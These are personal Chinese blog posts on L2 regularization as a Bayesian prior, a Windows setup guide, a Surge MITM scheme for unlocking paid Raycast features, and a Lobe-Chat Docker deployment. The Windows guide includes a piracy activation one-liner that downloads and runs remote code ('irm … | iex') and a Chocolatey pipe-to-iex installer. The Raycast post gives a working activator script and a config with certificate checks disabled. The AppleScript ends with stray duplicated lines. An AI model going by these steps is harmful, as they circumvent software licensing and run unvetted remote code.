在某些模型,比如线性回归中,我们假设数据 $Y$ 是由自变量 $X$ 的线性组合(由 $\beta$ 确定)加上一些随机噪声(由 $\sigma^2$ 描述)生成的。这个噪声代表了除了 $X$ 影响 $Y$ 之外的其它因素。所以,$\sigma^2$ 帮助我们了解除了主要效应(由 $\beta$​ 描述)之外,数据中还有多少随机波动。

我们采取高斯先验,也即假设参数遵循高斯分布(也称为正态分布)。那么也就有 $\beta \sim N(0, \tau^2I)$。

这表示:

  • 参数 $\beta$ 是一个 N 维向量,其中 N 是特征的数量
  • 其遵循均值为 0,方差为 $\tau^2$ 的多元高斯分布
  • $\tau^2I$ 是指协方差矩阵为 $\tau^2$ 的对角矩阵,这代表 $\beta$ 的每个元素都是相互独立的,且每个元素的方差都是 $\tau^2$。
  • 也就是说,各个维度独立同分布(iid)。

$\beta$ 的概率密度分布函数按照矩阵表示,则是:

$$ p(\beta) = \frac{1}{(2\pi)^{n/2}|\Sigma|^{1/2}} e^{-\frac{1}{2}(\beta - \mu)^T \Sigma^{-1} (\beta - \mu)} $$

可以比较一维版本来理解~

其中的 $| \Sigma |$ 是协方差矩阵的行列式,它的作用是保证概率密度函数的总面积为 1。而当它为对角矩阵时,还能额外保证各个维度彼此独立。

所以,我们有 $p(\beta) \propto e^{-\beta^T\beta/2\tau^2}$​。

这不包括归一化常数。$\propto$ 表示成比例,意味着这是未归一化的概率密度,它的形状随着 $\beta$ 的变化而变化,但是总面积(概率总和)是固定的。$\beta^T\beta$ 是 $\beta$ 的二次项,表示参数向量的长度的平方。

关于这一部分,可以阅读 钱默吟/多元高斯分布完全解析,讲的很详细。

这个式子的一个直观理解,就是假设 $\beta$ 是一个二维的,那么我们可以可视化这个分布:

gaussian_distribution

那么在这个图中,任意一个点都对应一个高斯分布,而 $f(x_1,x_2)$ 就是这个点的概率密度。我们可以看到,这个分布是关于原点对称的,这也是 $p(\beta)$ 中的 $\beta^T\beta$ 的作用,这代表了我们对于变量的顺序是没有偏好的。

带入进行复杂的数学推导 [^1] 后,我们就可以得到:

$$ \hat{\beta}{\mathbf{MAP}}=\arg\min\sum{i=1}^n(Y_i-X_i\beta)^2+\lambda\parallel\beta\parallel_2^2 $$

为什么刚才是 $\arg \max$,现在又变成了 $\arg \min$?简单说明就是,刚才我们要最大化从已知的 $\beta$ 中得到数据真实分布的概率,这就等价于最小化使用我们的模型,从 $X$ 中得到的数据的误差(也即最大似然估计)。

而 $\lambda$ 是一个超参数,它的作用是控制我们对于参数的偏好,也就是我们对于模型的复杂度的偏好。在后续的学习中,我们会知道 $\lambda\parallel\beta\parallel_2^2$ 其实是一个正则项,它的作用是防止过拟合。

当我们对于 $\beta$ 的先验假设不一样时,这个惩罚项(正则项)也会不一样。但大致原理不变,于是我们对这个形式加以推广,得到了类似如下的公式:

$$ \min_\beta(\mathbf{A}\beta-\mathbf{Y})^T(\mathbf{A}\beta-\mathbf{Y})+\lambda\mathrm{pen}(\beta)=\min J(\beta)+\lambda\mathrm{pen}(\beta) $$

其中,$J(\beta)$ 是我们的损失函数,$\mathrm{pen}(\beta)$ 是惩罚项。

对于惩罚项,我们一般有两个选择:

  • L1 正则(1 - 范数):$\mathrm{pen}(\beta)=\parallel\beta\parallel_1=\sum_{i=1}^n|\beta_i|$,见于 选择拉普拉斯分布作为先验分布
  • L2 正则(2 - 范数):$\mathrm{pen}(\beta)=\parallel\beta\parallel_2^2=\sum_{i=1}^n\beta_i^2$,见于 选择高斯分布作为先验分布

这两个惩罚项的解,具有如下特征:

  • L1 套索回归的正则化项:$\lambda \sum_{j=1}^{p} |\beta_j|$,这是一个 L1 范数,它对所有系数施加相同的惩罚,这会导致一些系数直接为零,从而产生一个 稀疏解非零 $w$ 更少
  • L2 岭回归的正则化项:$\lambda \sum_{j=1}^{p} \beta_j^2$,这是一个 L2 范数,它对大的系数施加更大的惩罚,导致系数平滑地趋近于零。有些 $w$ 更小

简而言之:岭回归无法剔除变量,套索回归的优良性质是能产生稀疏性,可以将一些不重要的回归系数缩减为 0,达到剔除变量的目的。 [^2]

可以这么记忆:对于较小的数值,考虑两个惩罚项的导数 / 梯度:

  • 对于 L1,惩罚项导数是一个常数,所以它会不区分大数值和小数值,因而小数值会更容易在这个梯度下降到 0,导致稀疏解
  • 对于 L2,惩罚项导数是一个一次项,所以它会区分大数值和小数值,对于大数值的下降更大,而对于小数值的下降很小,甚至趋于 0,所以他只是容易让参数变小,但不太会让它们达到 0。

最终,我们得到广义的线性模型,我们可以考虑任意一种单调可微的函数 $g(.)$:

$$ y=g^{-1}(w^Tx+b) $$

其中,$g(.)$ 是激活函数,它的作用是将线性模型的输出转换为我们想要的输出,也即将线性模型的输出转换为一个非线性的预测值。比如,当 $g(.)$ 是恒等函数时,我们就得到了线性回归;当 $g(.)$​ 是 sigmoid 函数时,我们就得到了逻辑回归。

nonlinear

在这个图中,$g$ 就是 $\log$ 函数,而对应的 $g^{-1}$ 就是 $e^x$ 指数函数。通过这个变换,我们将一个线性的 $y'= (w^Tx+b)$ 变换得到了非线性的 $y$。

Credit

关于最大化高斯分布的后验概率等价于最小化二阶范数的具体推导,还有一个由 GPT4 生成的推导过程:

在高斯分布下,假设权重 $w$ 遵循均值为 0,方差为 $\sigma^2$ 的正态分布,即 $w \sim \mathcal{N}(0, \sigma^2)$。那么权重的概率密度函数(PDF)为:

$$ P(w) = \frac{1}{\sqrt{2\pi\sigma^2}}\exp\left(-\frac{w^2}{2\sigma^2}\right) $$

取对数得到:

$$ \log P(w) = \log\left(\frac{1}{\sqrt{2\pi\sigma^2}}\right) - \frac{w^2}{2\sigma^2} $$

因为第一项 $\log\left(\frac{1}{\sqrt{2\pi\sigma^2}}\right)$ 是常数,对于优化问题,我们只考虑影响模型参数 $w$ 的项,所以可以忽略它。因此,我们只关注第二项:

$$ -\frac{w^2}{2\sigma^2} $$

在机器学习中,我们通常使用代价函数(或损失函数)来训练模型。假设我们的代价函数为 $J(w)$,为了使 $w$ 接近于高斯分布,我们可以在代价函数中增加对数先验 $\log P(w)$,即:

$$ J'(w) = J(w) - \lambda \log P(w) $$

其中 $\lambda$ 是正则化参数。将 $\log P(w)$ 代入上式得到:

$$ J'(w) = J(w) + \lambda \frac{w^2}{2\sigma^2} $$

我们可以看到这里的 $\lambda \frac{1}{2\sigma^2}$ 起到了正则化系数的作用。这个正则化项是 $w$ 的平方,即 $L2$ 正则项。通常我们将 $L2$ 正则化系数表示为 $\alpha = \lambda \frac{1}{2\sigma^2}$,所以代价函数可以写为:

$$ J'(w) = J(w) + \alpha w^2 $$

这显示了在高斯分布下 $\log P(w)$ 的效果等价于在代价函数中增加 $L2$​​ 正则项。这种正则化有时也被称为权重衰减,它鼓励模型学习更小的权重,从而可以提高模型的泛化能力,防止过拟合。

[^1]: L1,L2 正则化的理解

[^2]: SlimSRecovery / 线性回归模型估计

💾

从零开始配置 Windows

2024年2月12日 12:18

原则

  1. 能不装 C 盘就不装 C 盘,比如我装在 D:\Applications。原因是装在 C 盘一旦你重置系统之后软件就全没了。
  2. 在修改注册表前,一定先使用导出进行备份。

先放一个 Star List 在这里。

应用

Chrome

Chrome:先进的网络浏览器。

沉浸式翻译

沉浸式翻译:Chrome 插件,最好的网页翻译工具。

Typora

Typora:体验最好的 Markdown 编辑器。

NodeInject_Hook_example:Hack 脚本,未经测试。

Clash Nyanpasu

Clash Nyanpasu:魔法上网工具。UI 相当精致。

VS Code

VS Code:最好的 IDE。

Power Toys

Power Toys:微软官方出品的实用工具。

Pot

Pot:Windows 下的翻译工具,是 Bob 的平替,支持 OCR、划词翻译、截图翻译等。

Local Send

Local Send:局域网文件传输工具。

如果安装后打不开,提示缺少 dll,则前往 Microsoft Visual C++ Redistributable latest supported downloads 下载依赖安装。

Hoppscotch

Hoppscotch:API 请求工具。

360 压缩海外版

360 压缩海外版:可能不是性能最好的,但是是可用的压缩软件中颜值最好的一档。

Geek

Geek:Windows 下的 App Cleaner,可以完全彻底地卸载软件、清除注册表残留。

Tai

Tai:时间统计工具。

Project Eye

Project Eye:和 Tai 是同一家出品,好看好用的护眼软件,是一个基于 20-20-20 规则的用眼休息提醒软件,帮助保持健康的工作状态,追踪每天的用眼情况。

Office 365

Office 365:Office 365 安装镜像,官方直链。

更多版本:知乎总结

License:massgravel/Microsoft-Activation-Scripts:Windows、Office 激活脚本。

irm https://massgrave.dev/get | iex

Auto Dark Mode

Auto Dark Mode:自动切换 Windows 深色模式。

PicGo

PicGo:图床工具。

Flow launcher

Flow launcher:快速启动、文件搜索工具,比 Fluent Search 好看。看上去优化也更好。

Flow launcher ayu theme:Ayu 颜色主题。

Malware Patch

the1812/Malware-Patch:通过 UAC 阻止国产流氓软件的管理员授权, 无需后台运行.

注:开启此项后可能会导致对应软件无法安装,需要先临时禁用。

Synergy

Synergy-Binaries:可以同步 macOS 和 Windows 的键盘、鼠标、剪贴板的软件。

Shell

moudey/Shell:功能强大的 Windows 文件资源管理器上下文菜单管理器。

LyricEase

LyricEase:UWP 风格的第三方网易云音乐客户端,简洁、优雅,去除了多余评论功能等。

EverythingToolbar

srwi / EverythingToolbar:将 Everything 文件查找工具集成到搜索栏,替换原有的辣鸡搜索。

CLI

Chocolatey

Chocolatey:Windows 包管理器。

以管理员身份运行:

Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))

Gsudo

Gsudo:以管理员身份运行命令行。

choco install gsudo

Starship

Starship:跨平台的命令行美化。

choco install starship

移除自定义脚本限制:

set-executionpolicy remotesigned

PowerShell Ayu theme

PowerShell Ayu theme:PowerShell 主题。

Miniconda

Miniconda:Python 包管理器。

Git

Git:分布式代码版本控制系统。

选择:

  • Override the default branch name of new reositories
  • Git from the command line and also from 3rd-party software
  • Use bundled OpenSSH
  • Use the OpenSSL library
  • Checkout as-is, commit Unix-style line endings
  • Use MinTTY (the default terminal of MSYS2)
  • Fast-forward or merge
  • Git Credential Manager
  • Enable file system caching + Enable symbolic links
  • Enable experimental support for pseudo consoles + Enable experimental built-in file system monitor

WSL

WSL:适用于 Linux 的 Windows 子系统,可以在 Windows 上获得接近原生的 Linux 使用体验。

首先先从 optional features 打开 Hyper-V 、适用于 Linux 的 Windows 子系统、虚拟机平台。

运行指令安装最新版 Ubuntu:

wsl --install

如果提示:

没有注册类
Error code: Wsl/CallMsi/REGDB_E_CLASSNOTREG

则需要前往 Github Release 页面下载最新的 msi 文件安装。

如果提示:

WslRegisterDistribution failed with error: 0x80070424

使用 Win+R,输入 optionalfeatures,打开虚拟机平台选项。

  • PowerShell Config

以下是我的 PowerShell 配置文件,可以直接复制到 ~\Documents\PowerShell\Microsoft.PowerShell_profile.ps1(或者 $PROFILE) 中。

Set-Alias -Name open -Value explorer.exe
Invoke-Expression (&starship init powershell)
function Touch-File {
    param($fileName)
    New-Item $fileName -ItemType file
}
Set-Alias touch Touch-File

# Import the Chocolatey Profile that contains the necessary code to enable
# tab-completions to function for `choco`.
# Be aware that if you are missing these lines from your profile, tab completion
# for `choco` will not function.
# See https://ch0.co/tab-completion for details.
$ChocolateyProfile = "$env:ChocolateyInstall\helpers\chocolateyProfile.psm1"
if (Test-Path($ChocolateyProfile)) {
  Import-Module "$ChocolateyProfile"
}

function ChangeToProjectDirectory {
    cd D:\Project
}
Set-Alias -Name repo -Value ChangeToProjectDirectory

Node.js

Node.js:JavaScript 运行时。

系统

Raphire / Win11Debloat:Windows 系统冗余组件清理

字体

WSL

# 安装 zsh,并设置为默认 shell
sudo apt install zsh
chsh -s /bin/zsh

# 安装 rcm,并恢复配置文件
sudo apt update
sudo apt install rcm
git clone https://github.com/zhuozhiyongde/dotfiles.git ~/.dotfiles
rcup -t wsl

# 安装必要的软件
sudo apt-get update
sudo apt-get install build-essential unzip

防火墙:

wsl-defender

然后还需要注意要在 zsh 里手动配置 http_proxy https_proxy all_proxy 三个环境变量,并且要打开 Clash 的局域网连接选项,才可以实现正常的网络通信(可以通过设置 .zshrc 文件来实现自动配置)。

Miniconda

mkdir -p ~/.miniconda3
wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/.miniconda3/miniconda.sh
bash ~/.miniconda3/miniconda.sh -b -u -p ~/.miniconda3
rm -rf ~/.miniconda3/miniconda.sh
~/.miniconda3/bin/conda init zsh

SSH

先复制 .ssh 文件夹到根目录下,然后修改权限:

chmod 600 ~/.ssh/id_rda ~/.ssh/id_rsa.pub

如果你发现链接不上 github,但是其他的 ssh 服务器都正常,可能是你在 .ssh/config 中修改过对于 github.com 的链接代理,如下所示,请删除/更改之:

kex_exchange_identification: Connection closed by remote host
Connection closed by UNKNOWN port 65535
fatal: Could not read from remote repository.

Git

先复制 .gnupg 文件夹到根目录下。

安装 git-deltaGithub CLI

gh auth login
gh auth setup-git

选择 HTTPS 选项以配置 Git Credential。

其他

禁止管理员权限提升全局提示(不建议开启

💾

使用 Surge + Docker 完整解锁 Raycast(含 AI 功能)

2024年1月31日 07:42

前几天听说了 Surge 这个据称是 macOS 下最好的网络分析工具,试用了一下发现确实好用,而且关键的是颜值很在线,深得我心,遂入正,从 Clash 完全转来了 Surge。

虽然但是,Surge 存在一个很大的问题,就是虽然功能强大,但是它的配置实在是太不现代化了,一个形如 .ini 的格式,但是又允许重复键名,这让自动化解析、生成它的配置文件多了许多困难,最终我在尝试 Python 的 Configparser 发现行不通后,还是老老实实的回到了使用 f.write() 和字符串、正则表达式重新构建了整个配置文件。

折腾完了基本的配置之后,显然就要开始折腾一些高级功能了。在使用 Surge 之前,我就听闻过它可以通过 MiTM 中间人攻击来解锁一些应用的高级功能,于是就开始了这次的折腾。

[!CAUTION]

This project is for educational purposes only. Please do not use it for commercial purposes.

完整的配置教程、脚本代码、镜像源代码均已开源:

https://github.com/zhuozhiyongde/Unlocking-Raycast-With-Surge

利用 Surge 的 MiTM 功能拦截请求,并利用 Docker 服务模拟后端操作,从而实现 Raycast 的激活。

Docker 服务是一个简单的 Raycast 的 API 代理。它允许您在不订阅的情况下使用包括 Raycast AI 、翻译、同步在内的 Pro 功能(但是都需要你拥有自己的 API Key)。实现原理如下:

  • Raycast Pro:在服务端修改 /me/ai/models 等关键请求的返回字段。
  • Raycast AI:对于非 AI Completions 之外的某些请求的返回值修改关键字段,而对于 AI Completions 的请求,将 Raycast 的请求转换格式转发到 OpenAI 的 API,响应后再实时转换格式返回。
  • Translator:目前的翻译功能实现也是基于 OpenAI 的,会很慢,你可以自行换成别的商业 API 。
  • Sync:基于本地 JSON 处理,没有用到数据库,避免了额外的配置,但是会有一定的性能损失。

Docker 服务修改自 yufeikang/raycast_api_proxy。由于我在迁移的时候出现了问题,新建此仓库后失去了 fork 的属性。但保留了 .git 贡献历史。

在开始之前,请确保你拥有以下条件:

  • Surge 激活版本
  • 一台云服务器,拥有 Docker、公网 IP
  • 一个域名
  • 一个 Open AI 格式的 API Key 与对应的 Base URL

本文用到的的服务器配置为:Ubuntu 22.04,1Panel + OpenResty + Docker

鉴于会折腾 MiTM 的朋友应该是有一定基础的,本文我主要给出具体的配置文件,还有自己的一些踩坑。

整体的配置思路如下:

Raycast - Surge MiTM 覆写请求 URL - 云服务器 - Nginx 反向代理 - Docker 后端。

使用方法

在服务端启动后端服务

由于 Raycast 的 AI 功能请求与返回都进行了包装,直接请求类似 OpenAI 的接口并不可行,需要使用一个转接器来模拟 Raycast 的后端转接格式,这就需要我们自行搭建并运行后端。

基于 Docker 的方法

此 Docker 镜像修改自 yufeikang/raycast_api_proxy,修复了一些迁移到服务器上会导致的问题。

docker run --name Raycast \
    -e OPENAI_API_KEY=sk-xxxx \
    -e OPENAI_BASE_URL=https://api.openai.com/v1/ \
    -p 12443:80 -e LOG_LEVEL=INFO -d arthals/raycast-backend:latest

这会在你的服务器上的 12443 端口启动一个 Raycast 的 API 代理服务,你需要自行修改 OPENAI_API_KEYOPENAI_BASE_URL

这里存在两处需要注意的地方:

  1. 原仓库给的示例是 OPENAI_API_BASE,但是由于 openai 库升级了,所以现在需要使用 OPENAI_BASE_URL
  2. 原仓库给的示例有一个 --dns 1.1.1.1 的配置,但是由于众所周知的原因,腾讯云的服务器无法访问这个 DNS 服务器,所以你需要移除这个配置。

注意 OPENAI_BASE_URL 的计算方式如下:

如果你的 API 请求的 URL 是 https://api-proxy.com/v1/chat/completions ,那么就是 https://api-proxy.com/v1/

为了使用此代理,你还需要按照下文设置 Surge MiTM 与服务器 Nginx 配置以支持流式传输。

SSL 证书直接通过 1Panel 的 Nginx(Openresty)搞定就行。与 Surge 和服务器后端均无关。

本仓库只支持服务器使用,本地使用需要能自行签发 SSL 证书。若本地使用建议参照原仓库操作。

基于 Python + PM2 的方法

你亦可以简单的使用 Python 和 PM2 来启动服务:

# 安装依赖
pip install -r requirements.txt
# 启动服务
pm2 start 'OPENAI_API_KEY="sk-xxxx" OPENAI_BASE_URL="https://api.openai.com/v1/" uvicorn app.main:app --host 0.0.0.0 --port 12443 --reload' --name Raycast

Nginx 服务端配置

按照正常的 1Panel + OpenResty 配置一个反向代理网站,将 https://custome-backend.self.com/ 代理到 http://127.0.0.1:12443/ 即可。

特别地,你需要修改反向代理的配置文件,移除默认的压缩算法以支持流式传输,你可以参见:https://github.com/lobehub/lobe-chat/discussions/531

修改后的反向代理配置文件示例如下:

location ^~ / {
    proxy_pass http://127.0.0.1:12443;
    proxy_set_header Host $host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_set_header REMOTE-HOST $remote_addr;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_http_version 1.1;
    add_header Cache-Control no-cache;
    proxy_cache off;  # 关闭缓存
    proxy_buffering off;  # 关闭代理缓冲
    chunked_transfer_encoding on;  # 开启分块传输编码
    tcp_nopush on;  # 开启TCP NOPUSH选项,禁止Nagle算法
    tcp_nodelay on;  # 开启TCP NODELAY选项,禁止延迟ACK算法
    keepalive_timeout 300;  # 设定keep-alive超时时间为65秒
}

Surge MiTM 配置与激活脚本

本质是劫持 Raycast 的请求,将请求转发到服务器上。配置如下:

# surge.conf
[MITM]
skip-server-cert-verify = true
h2 = true
hostname = *.raycast.com
ca-passphrase = ...
ca-p12 = MIIKP...

[Script]
raycast-activate-backend.raycast.com = type=http-request,pattern=^https://backend.raycast.com,max-size=0,debug=1,script-path=activator.js

请注意,你需要将 ca-passphraseca-p12 替换为你自己的 Surge CA 密码与证书。

其中用到的 activator.js 脚本修改自 wibus-wee/activation-script,你需要自行修改其中的 https://custome-backend.self.com 为你的服务器地址。

请将 activator.js 放置在 Surge 配置文件夹下。

Activator.js 内容如下(亦可在本仓库找到):

'use strict'

function transformToString(obj) {
  if (typeof obj === 'object') {
    return JSON.stringify(obj)
  }
  return obj
}
/**
 * 构建 Surge 响应体
 *
 * @param props 响应体属性
 * @description 该函数将会自动将对象转换为 JSON 字符串,因此你可以直接传入对象
 */
function buildResponse(props) {
  if (props.body) {
    props.body = transformToString(props.body)
  }
  // console.log(props.body);
  $done({
    ...props
  })
}
/**
 * 发送通知
 *
 * @param title 标题
 * @param subtitle 副标题
 * @param body 内容
 * @description 该函数将会自动将对象转换为 JSON 字符串,因此你可以直接传入对象
 */
function sendNotification(title, subtitle, body) {
  title = transformToString(title)
  subtitle = transformToString(subtitle)
  body = transformToString(body)
  $notification.post(title, subtitle, body)
}
const methods = ['get', 'put', 'delete', 'head', 'options', 'patch', 'post']
/**
 * 发送请求
 * @param props 请求参数
 * @param callback 回调函数
 */
const httpClient = {}
for (let method of methods) {
  // @ts-ignore
  httpClient[method] = (props, callback) => {
    $httpClient[method](props, callback)
  }
}

/**
 * @url https://backend.raycast.com/api/
 */
function raycastActivate() {
  $done({
    url: $request.url.replace('https://backend.raycast.com', 'https://custome-backend.self.com'),
    headers: $request.headers,
    body: $request.body
  })
}

const activator = {
  raycast: {
    base: 'https://backend.raycast.com/api/',
    activate: [
      {
        base: '*',
        func: raycastActivate
      }
    ]
  }
}

const url = $request.url
/**
 * Determine whether the URL matches the base
 */
function isMatchBase(url, base) {
  if (Array.isArray(base)) {
    for (let item of base) {
      if (url.includes(item)) {
        return true
      }
    }
    return false
  }
  return url.includes(base)
}
/**
 * Automatic execution of the corresponding function according to the URL
 */
function launch() {
  for (let module in activator) {
    if (isMatchBase(url, activator[module].base)) {
      for (let key in activator[module]) {
        if (key === 'base') continue
        if (Array.isArray(activator[module][key])) {
          for (let custom of activator[module][key]) {
            // 检查 custom.base 是否为通配符 '*',如果是,则匹配任何以 activator[module].base 开头的URL
            if (custom.base === '*' && url.startsWith(activator[module].base)) {
              return custom.func()
            }
            // 否则,检查精确匹配
            else if (url === `${activator[module].base}/${custom.base}`) {
              return custom.func()
            }
          }
          continue
        }
        if (typeof activator[module][key] === 'object') {
          // 检查是否为通配符 '*',如果是,则匹配任何以 activator[module].base 开头的URL
          if (activator[module][key].base === '*' && url.startsWith(activator[module].base)) {
            return activator[module][key].func()
          }
          if (url === `${activator[module].base}/${activator[module][key].base}`) {
            return activator[module][key].func()
          }
        } else if (!url.includes(`${activator[module].base}/${key}`)) {
          continue
        }
        if (typeof activator[module][key] === 'function') {
          return activator[module][key]()
        }
      }
    }
  }
  console.log(`[activator] ${url} is not matched`)
  returnDefaultResponse()
  $done()
  return
}
function returnDefaultResponse() {
  console.log(`[activator] returnDefaultResponse: ${url} - ${$request.method.toLowerCase()}`)
  // @ts-expect-error
  httpClient[$request.method.toLowerCase()](
    {
      url: $request.url,
      headers: $request.headers
    },
    (err, response, _data) => {
      if (!_data) {
        console.log('returnDefaultResponse: _data is null', err)
        buildResponse({
          status: 500,
          body: {}
        })
      }
      buildResponse({
        status: response.status,
        headers: response.headers,
        body: _data
      })
    }
  )
}

launch()

Credit

wibus-wee/activation-script

yufeikang/raycast_api_proxy

💾

macOS 下的 GPT4 最佳实践

2024年1月28日 06:25

谨以此文,记录自己折腾的时光。

回想起我使用 GPT 的经历,从网页的免费版 3.5 到从朋友那里代付获得 API Key 之后搓了一个公用的 ChatGPT-Demo 供朋友们使用:

https://github.com/anse-app/chatgpt-demo

GPT 4 出来以后,我又折腾了包括 ChatGPT-Next-Web 在内的多个 GPT 客户端,直到现在,折腾出来了我心目中最好用的 Lobe-Chat。

可能是因为自己搞过很久的设计,甚至现在还兼任全元光滑的美工,我自己一向对于设计有很高的要求,无论是 macOS 还是 Windows,我选用软件的哲学永远是:在功能差不多的范围内,优先选择最好看的。甚至有时候,即使一个软件的功能很强大(比如 7zip),但是我觉得它没有提供一个很好的 GUI,我也会选择另外一个软件(比如 360 压缩海外版)。这也体现在我折腾 PKU VPN 的时候,我乐此不疲的折腾了 Docker、Openconnect、FastAPI,只为了能够彻底摆脱丑陋的 Pulse Secure。

说回 GPT。我折腾的历史正如前文所述,在 GPT 3.5 API 刚出的时候,我就毅然决然地选择了好看、简洁、优雅的 ChatGPT-Demo,而不是其他的一些功能更强大的前端项目(比如 ChatGPT-Next-Web),并一直用了很久,直到 GPT 4 出来以后,我发现原作者 DDiu 并没有及时的更新 GPT 4 Vision 相关的支持,只能辗转寻找其他的项目。终于,我在一个 DDiu 的前端粉丝群里知道了 Lobe-Chat:

https://github.com/lobehub/lobe-chat

Lobe Chat 作为一个 GPT API 的客户端来讲,几乎完全没有缺点:

  • 界面简洁、优雅、美观,没有任何多余的东西
  • 功能齐全,支持各种 API(包括 GPT 4 Vision),支持 Docker 部署,支持 PWA
  • 代码开源,配置项多样,可以自己定制
  • 作者用爱发电令人敬佩,issue 总是能得到及时的修复

几番探索下来,我终于确定了这个我认为的 macOS 下 GPT 4 的最佳实践,我通过撰写各类脚本,实现了如下功能:

  • 自动更新的 Lobe-Chat 服务器 Docker,可以供任意平台以网页或者 PWA 的形式访问。
  • 基于 Alfred Workflow 的 macOS Lobe-Chat PWA 随时快捷键 Option+W 的唤起 / 隐藏,方便使用。
  • 限制模型,使用成本相对可控的 GPT 4 (Vision) Preview,隐藏 GPT 4 模型,避免小白朋友不小心刷爆 API Key。

Lobe Chat 的服务器 Docker 部署

Lobe Chat 的部署十分简单,只需要服务器上安装好 Docker,然后使用:

docker pull lobehub/lobe-chat
docker run -d --network=host -e OPENAI_API_KEY=sk-xxx -e OPENAI_PROXY_URL=https://xxx -e ACCESS_CODE="xxx" -e CUSTOM_MODELS="-gpt-4,-gpt-4-32k,-gpt-3.5-turbo-16k,gpt-3.5-turbo-1106=gpt-3.5-turbo-16k,gpt-4-1106-preview=gpt-4-turbo,gpt-4-vision-preview=gpt-4-vision" --name=Lobe-Chat --restart=always lobehub/lobe-chat

完整的配置项可以参见:https://github.com/lobehub/lobe-chat/wiki/Docker-Deployment.zh-CN

我的设置修改了 API Key 与配套的代理地址以降低成本(将 GPT 作为公开服务供身边朋友使用后,在官方 API 计费下,我月均付费 200 ¥,上个月叠加期末季与论文季,甚至达到了 500 ¥,所以我选择了国内的代理 API),并且只保留了 4 个我认为是必要且成本可控的模型,设置了访问密码,以及设置了 Docker 的自动重启。

这是一个示例指令,我的完整脚本配置如下,其可以实现自动更新、重启最新的 Lobe Chat 的 Docker 服务,并移除旧的镜像:

#!/bin/bash
# auto-update-gpt.sh

# 设置代理
export https_proxy=http://127.0.0.1:7890 http_proxy=http://127.0.0.1:7890 all_proxy=socks5://127.0.0.1:7890

# 拉取最新的镜像并将输出存储在变量中
output=$(docker pull lobehub/lobe-chat:latest 2>&1)

# 检查拉取命令是否成功执行
if [ $? -ne 0 ]; then
    exit 1
fi

# 检查输出中是否包含特定的字符串
echo "$output" | grep -q "Image is up to date for lobehub/lobe-chat:latest"

# 如果镜像已经是最新的,则不执行任何操作
if [ $? -eq 0 ]; then
    exit 0
fi

echo "Detected Lobe-Chat update"

# 删除旧的容器
echo "Removed: $(docker rm -f Lobe-Chat)"

# 运行新的容器
echo "Started: $(docker run -d --network=host -e OPENAI_API_KEY=sk-xxx -e OPENAI_PROXY_URL=https://xxx -e ACCESS_CODE="xxx" -e CUSTOM_MODELS="-gpt-4,-gpt-4-32k,-gpt-3.5-turbo-16k,gpt-3.5-turbo-1106=gpt-3.5-turbo-16k,gpt-4-1106-preview=gpt-4-turbo,gpt-4-vision-preview=gpt-4-vision" --name=Lobe-Chat --restart=always lobehub/lobe-chat)"

# 打印更新的时间和版本
echo "Update time: $(date)"
echo "Version: $(docker inspect lobehub/lobe-chat:latest | grep 'org.opencontainers.image.version' | awk -F'"' '{print $4}')"

# 清理不再使用的镜像
docker images | grep 'lobehub/lobe-chat' | grep -v 'latest' | awk '{print $3}' | xargs -r docker rmi > /dev/null 2>&1
echo "Removed old images."

配置 Crontab,每 5 分钟执行一次脚本:

*/5 * * * * /home/ubuntu/APTX4869/auto-update-gpt.sh >> /home/ubuntu/APTX4869/auto-update-gpt.log 2>&1

使用 1Panel 配置 Nginx 反代,感觉比较重要的相关折腾内容包括:

在国内无法访问 OpenAI 官方 API 时,设置基于 Vercel 的透明代理(由于 vercel.app 已经被墙,你还是需要有一个自己的域名):

https://github.com/lobehub/lobe-chat/discussions/466

配置 Nginx 以实现流式传输:

https://github.com/lobehub/lobe-chat/discussions/531

更进一步的,配置域名解析与 SSL 证书等,就不在此处展开了。

macOS 上的 Lobe Chat PWA

macOS 需要更新到最新的 Sonoma(macOS 14),才能使用基于 Safari 的 PWA 功能。

在先前版本上,只能使用 Chrome PWA 作为替代,缺点是打开时必须同时打开 Chrome。或者直接设置网页标签也可以。

我在 Safari PWA 的基础上,额外使用了 ~~Alfred Workflow~~ Raycast 与 AppleScript,实现了快捷键 Option+W 的唤起 / 隐藏,方便使用:

#!/usr/bin/osascript

# Required parameters:
# @raycast.schemaVersion 1
# @raycast.title Lobe Chat
# @raycast.mode silent

# Optional parameters:
# @raycast.icon ./icons/lobe-chat.png
# @raycast.packageName Open/Hide Lobe Chat

# Documentation:
# @raycast.author Arthals
# @raycast.authorURL https://raycast.com/Arthals

-- AppleScript to check if LobeChat is the frontmost application
tell application "System Events"
    set frontmostProcess to first application process whose frontmost is true
    set frontmostApp to displayed name of frontmostProcess
end tell

-- Determining if LobeChat is the frontmost application
if frontmostApp is "LobeChat" then
    set isLobeChatFrontmost to true
else
    set isLobeChatFrontmost to false
end if

-- Output the status of LobeChat (whether it is frontmost or not)

-- AppleScript to hide LobeChat
if isLobeChatFrontmost then
    tell application "System Events" to set visible of process "LobeChat" to false
else
    -- AppleScript to bring LobeChat to the front
    tell application "LobeChat" to activate
end if
on "LobeChat" to activate
end if

这个脚本可以实现在 Lobe Chat 未打开时,打开 Lobe Chat,而在 Lobe Chat 已打开时,隐藏 Lobe Chat。我认为这十分符合我的使用习惯。

如果没有安装 Raycast,也可以使用 Automator 与快捷键绑定来实现类似的功能,具体请自行谷歌。

preview

💾

更适合北大宝宝体质的 Data Lab 踩坑记

2024年1月15日 12:36

[!CAUTION]

致各位同学:本笔记的撰写目的是用作参考,请勿直接抄袭,否则后果自负。

我的推荐做法是,你可以阅读我的博文后了解都有哪些坑,但自己实现的时候千万不要看我的代码,避免抄袭风险。

Data lab 是 ICS 的第一个 lab,虽然说出来可能会很打击大家的积极性,但它确实也是 ICS 最简单的一个 lab。

在这个 lab 中,我们需要在各种限制下,基于位运算和逻辑运算,实现一些函数,这些函数也被称为谜题(puzzle)。

这些 puzzle 包括:

位运算:

